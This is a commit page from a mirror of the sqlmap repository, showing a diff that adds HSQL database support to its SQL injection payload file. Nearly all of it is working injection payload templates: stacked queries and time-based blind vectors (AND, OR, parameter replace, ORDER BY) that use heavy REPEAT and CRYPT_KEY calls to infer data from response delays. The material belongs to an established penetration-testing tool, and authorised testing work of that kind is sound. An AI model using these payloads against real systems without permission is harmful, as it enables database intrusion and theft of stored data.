PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2026-02-06 13:36:38 +00:00
Code Issues Projects Releases Wiki Activity

Merge pull request #475 from Meatballs1/hsql_clean

Browse Source 
HSQL Payloads and Query Support
This commit is contained in:
Miroslav Stampar
2013-07-01 02:38:04 -07:00
parent a1842f44f5 eb2012c599
commit aeb83ba651
17 changed files with 764 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files

293
xml/payloads.xml
View File

@@ -1127,7 +1127,6 @@ Formats:
</test>
<!-- End of stacked conditional-error blind queries tests -->
<!-- Error-based tests - WHERE or HAVING clause -->
<test>
<title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
@@ -1878,7 +1877,6 @@ Formats:
-->
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
@@ -1996,7 +1994,6 @@ Formats:
</test>
<!-- End of inline queries tests -->
<!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
@@ -2245,6 +2242,48 @@ Formats:
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 2.0 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of stacked queries tests -->
@@ -2712,6 +2751,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of AND time-based blind tests -->
@@ -2931,6 +3052,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests -->
@@ -3211,7 +3414,7 @@ Formats:
</test>
<test>
<title>IBM DB2 AND time-based blind (heavy query)</title>
<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
@@ -3228,6 +3431,47 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- End of time-based blind tests - Parameter replace -->
@@ -3389,6 +3633,47 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->